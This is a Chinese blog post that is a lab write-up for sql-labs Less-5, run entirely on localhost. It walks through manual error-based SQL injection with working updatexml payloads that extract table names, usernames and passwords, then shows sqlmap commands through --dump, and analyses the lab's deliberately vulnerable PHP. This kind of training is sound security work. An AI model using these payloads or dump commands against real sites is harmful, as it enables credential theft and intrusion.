sql-labs靶场第五关测试报告

于 2024-10-04 10:15:00 发布
阅读量450 收藏 13
点赞数 19
分类专栏: sql-labs靶场 文章标签: sql 数据库 网络安全 sqlmap sql注入 web漏洞 火狐浏览器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79698171/article/details/142691587
版权

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、寻找注入点

2、注入数据库

①Order by判断列数

②寻找注入方式

③爆库,查看数据库名称

④爆表,查看security库的所有表

⑤爆列,查看users表的所有列

⑥成功获取用户名和密码信息

3、sqlmap注入方法

①爆库

②爆表

③爆列

④爆字段

四、源代码分析

五、结论

一、测试环境

1、系统环境

渗透机:本机(127.0.0.1)

靶  机:本机(127.0.0.1)

2、使用工具/软件

火狐浏览器的hackbar插件,版本:2.3.1;

测试网址:http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/

二、测试目的

测试get型的sql注入,报错注入出数据库中的用户名和密码;

使用sqlmap爆破,熟悉sqlmap的参数。

三、操作过程

1、寻找注入点

根据提示,将id作为参数,值为数字

输入id之后,页面回显  You are in...........

测试符号

给数字加个引号  ‘   ,回显报错,存在sql注入,注入点在url的id值

字符型注入

添加1=1判断,回显又正常,那么闭合符为   ‘    

?id=1' and 1=1 --+

尝试1=2判断,没有回显

?id=1' and 1=2 --+

2、注入数据库

①Order by判断列数

这关的payload闭合符号为   ‘

传入id值,先用order by 查看列数,可见数据库表共三列,查看第四列报错,是有报错信息的

?id=1' order by 3 --+

?id=1' order by 4 --+

②寻找注入方式

使用联合查询注入,发现没有回显的地方

?id=1' union select 1,2,3 --+

有报错信息,尝试报错注入,有结果显示

?id=1'and updatexml(1,concat(0x7e,1213124,0x7e),1) --+

③爆库,查看数据库名称

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

Database()函数返回当前数据库

④爆表,查看security库的所有表

?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from
information_schema.tables where table_schema=database()),1,31),0x7e),1) --+

使用inforamtion_schema数据库的tables方法查看本数据库的所有表

⑤爆列,查看users表的所有列

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from
information_schema.columns where table_name='users' and
table_schema=database()),1,31),0x7e),1) --+

依旧是inforamtion_schema数据库,使用columns方法查看对应数据表的所有列

⑥成功获取用户名和密码信息

爆字段值,查看username和password字段的所有信息

?id=1' and updatexml(1,concat(0x7e,substr((select
group_concat(concat(username,'^',password)) from users),1,31),0x7e),1) --+

可以爆破出用户名和密码信息,更改updatexml函数的第二个参数,起始显示位置,将后面的数据显示

Updatexml函数一次性最大显示31个字符

3、sqlmap注入方法

①爆库

Sqlmap方法只需要把url的less-1改为5就可以了,结果都是一样的

Sqlmap稳定发挥,yyds

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1 –dbs

使用python程序

-u  指定url

--dbs   是爆库的参数

②爆表

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1 -D security –tables

-D  指定数据库,在这个数据库里找数据表

--tables   爆表的参数

③爆列

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1 -D security -T users –columns

-D   指定数据库

-T   指定数据表

--columns    爆破列名的参数

④爆字段

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1 -D security -T users -C username,password --dump

-D   指定数据库

-T   指定数据表

-C   指定需要爆破的列名

--dump    爆破字段值的参数

四、源代码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";
    }
    else 
    {
    
    echo '<font size="3" color="#FFFF00">';
    print_r(mysql_error());
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    
    
    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

1.error_reporting(0);函数,关闭了php代码的所有错误报告。

2.获取的id值,直接写入了日志记录文件,同时也直接应用在sql语句中,没有任何过滤。

3.这里语句正确只会回显“you are in ….”,语句错误会输出mysql_error函数,利用报错输出的特点进行注入。

4.Sql语句只取一行,注入时会把注释掉。

5.页面输出内容,利用updatexml函数的特点可以拼接sql语句进行注入,回显出数据库内容。

五、结论

传递id号是sql注入漏洞的一大特点,有id参数就需要特别留意。

寻找注入点的步骤十分重要,找到注入点和闭合符号之后的测试就顺理成章了。

用sqlmap的话,需要把id参数带上,不然爆不出来。

这关使用报错注入,利用updatexml函数可以执行sql语句。

ccc_9wy
关注
专栏目录
SQL-Labs靶场“46-50”教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
SQL-Labs靶场“36-37”教程
钟言的博客
03-19 3494
本篇为SQL-Labs靶场的36到37的通教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“34-35”教程
钟言的博客
03-18 2604
本篇为SQL-Labs靶场的34到35教程,详细内容包含了:34 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“32-33”教程
钟言的博客
03-14 5749
本篇为SQL-Labs靶场的第32到33的通教程(宽字节注入),详细内容包含了、32 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
sql-labs靶场第二测试报告
ccc_9wy的博客
10-03 630
sql-labs靶场第二测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
sql-labs靶场第三测试报告
ccc_9wy的博客
10-03 508
sql-labs靶场第三测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
sql-labs靶场第一测试报告
ccc_9wy的博客
09-26 1211
完整详细测试sql-labs靶场第一; 测试get型的sql注入,联合查询注入出数据库中的用户名和密码; 使用sqlmap爆破,熟悉sqlmap的参数。
sql-labs靶场第四测试报告
最新发布
ccc_9wy的博客
10-04 563
sql-labs靶场第四测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程。
sqli-labs靶场第一详解
qq_43784516的博客
01-28 1531
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场练习笔记
11-09
- **第5:布尔盲注实战** - **特点**:同第3,但使用的是单引号布尔盲注。 - **实现思路**:通过比较页面响应时间来判断数据库名称、表名等信息。 - **示例**:使用`and`语句结合`if`判断数据库名称首字母的...
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1909
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场】第11
qq_61019688的博客
04-26 815
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1812
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
实用SQL小总结
UntifA的博客
09-29 1323
SQL记录
PostgreSQL的表碎片
文牧之的博客
09-29 501
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 392
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
sql中的regexp与like区别
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
09-26 5298
对于字符串数据的模糊匹配,REGEXP(正则表达式)和LIKE是两个非常有用的操作符。
SQL中基本SELECT语句及常见键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 907
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句键字主要包括 insert 、 delete 、 update 等。
sqlmapsqli-labs靶场第一
01-06
以下是使用sqlmapsqli-labs靶场第一的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值